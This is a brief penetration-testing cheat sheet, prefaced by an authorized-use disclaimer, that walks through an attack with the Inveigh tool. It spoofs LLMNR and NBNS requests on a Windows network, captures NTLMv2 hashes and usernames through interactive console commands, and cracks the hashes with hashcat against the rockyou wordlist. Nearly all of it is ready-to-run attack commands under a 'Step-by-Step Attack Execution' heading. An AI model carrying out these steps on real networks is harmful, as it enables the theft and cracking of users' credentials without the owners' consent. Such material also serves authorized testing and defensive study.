Disclaimer: This material is provided for educational purposes and authorized security testing only. You are solely responsible for how you use the information. Do not use these techniques on systems without explicit permission from the owner. We do not encourage any kind of illegal or harmful activity

Running Inveigh in PowerShell

1. Load the Inveigh module into PowerShell:
   

   Import-Module .\Inveigh.ps1
   

2. Check available parameters for the Invoke-Inveigh cmdlet:
   

   (Get-Command Invoke-Inveigh).Parameters
   

3. Run Inveigh to start spoofing LLMNR and NBNS requests, with console and file output enabled:
   

   Invoke-Inveigh -LLMNR Y -NBNS Y -ConsoleOutput Y -FileOutput Y
   

Using InveighZero (C# Version)

1. Run the C# version of Inveigh:
   

   .\Inveigh.exe
   

2. Enter the interactive console: Press ESC to switch to interactive mode.

3. Use the following commands within the console for specific information:

4. Get one captured NTLMv2 hash per user:
   

   GET NTLMV2UNIQUE
   

5. Get usernames and source IPs/hostnames:
   

   GET NTLMV2USERNAMES
   

Step-by-Step Attack Execution

1. Start Inveigh with default settings:
   

   Invoke-Inveigh -LLMNR Y -NBNS Y -ConsoleOutput Y -FileOutput Y
   

2. Use the console commands to view captured hashes and usernames.

3. Captured hashes are saved in the specified output directory. By default, they are stored in:
   

   C:\Tools
   

4. Prepare hashes for cracking. Ensure they are in a format compatible with Hashcat.

5. Crack the hashes with Hashcat:
   

   hashcat -m 5600 hash_file.txt /usr/share/wordlists/rockyou.txt